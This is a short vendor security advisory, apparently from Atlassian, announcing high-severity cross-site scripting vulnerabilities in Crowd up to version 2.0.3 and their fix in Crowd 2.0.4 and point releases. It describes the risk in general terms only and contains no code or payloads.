This advisory announces a number of security vulnerabilities in earlier versions of Crowd that we have found and fixed in Crowd 2.0.4. In addition to releasing Crowd 2.0.4, we also provide point releases for earlier versions of Crowd to fix the vulnerabilities reported here.

In this advisory:

XSS Vulnerabilities

Severity

Atlassian rates these vulnerabilities as high, according to the scale published in Severity Levels for Security Issues. The scale allows us to rank a vulnerability as critical, high, moderate or low.

Risk Assessment

We have identified and fixed a number of cross-site scripting (XSS) vulnerabilities which may affect Crowd instances in a public environment.

An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's own web server.

An attacker's text and script might be displayed to other people viewing the Crowd page. This is potentially damaging to your company's reputation.

You can read more about XSS attacks at cgisecurity, CERT and other places on the web.

Vulnerability

The table below lists the affected areas of Crowd. These XSS vulnerabilities exist in all versions of Crowd, up to and including Crowd 2.0.3.